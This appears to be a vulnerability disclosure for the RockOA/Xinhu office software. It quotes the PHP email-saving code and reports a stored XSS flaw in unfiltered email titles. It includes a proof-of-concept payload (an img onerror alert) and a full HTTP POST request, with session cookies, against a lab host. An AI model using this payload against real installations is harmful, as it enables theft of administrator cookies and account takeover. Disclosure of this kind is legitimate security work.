Official website: http://www.rockoa.com/
demo link: http://demo.rockoa.com/
Vulnerability path: webmain/flow/input/mode_emailmAction.php
line: 34-63
protected function saveafter($table, $arr, $id, $addbo)
{
$isturn = (int)$arr['isturn'];
$type = (int)$arr['type'];
if($isturn==1){
if($type==0){
$this->flow->savesubmid($arr['receid'], $id, 0,0);
$this->flow->savesubmid($arr['ccid'], $id, 1,0);
}
$this->flow->savesubmid($arr['sendid'], $id, 2,1);
//外发发邮件的
if($type == 1){
$emsa = $this->getrecename($arr['receid']);
if($emsa != ''){
$ccsa = $this->getrecename($arr['ccid']);
$fjar = m('file')->getfilepath('emailm', $id);
m('email')->sendemailout($this->adminid, array(
'title' => $arr['title'],
'body' => $arr['content'],
'receemail' => $emsa[0],
'recename' => $emsa[1],
'ccemail' => $ccsa[0],
'ccname' => $ccsa[1],
'attachpath'=> $fjar[0],
'attachname'=> $fjar[1],
), 1);//自己发送,不异步
}
}
}
}
Send email no filtering of dangerous characters leads to XSS, which can be used to obtain administrator cookies.
Verification:
user: wangjing
wangjing(user) send email administrator
title:
<img src=x onerror=alert(/xss_test/)>
poc:
POST /xinhu/index.php?a=save&m=mode_emailm|input&d=flow&ajaxbool=true&rnd=897989 HTTP/1.1
Host: 192.168.174.136:829
Content-Length: 193
Accept: */*
Origin: http://192.168.174.136:829
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.174.136:829/xinhu/?a=lu&m=input&d=flow&num=emailm&mid=0&callback=
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=gjqr8gpe7g4dlrqjjjmfvl2ja4; deviceid=1571022073329; xinhu_ca_rempass=0; xinhu_mo_adminid=ru0tvv0mn0yn0ur0mt0rv0tvt0mm0tvv0mm0yr08; xinhu_ca_adminuser=wangj
Connection: close
id=0&title=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss_test%2F)%3E&type=0&isturn=1&recename=%E7%AE%A1%E7%90%86%E5%91%98&receid=u1&ccname=&ccid=&content=xss_test&fileid=&sysmodeid=47&sysmodenum=emailm
After the administrator logged Trigger XSS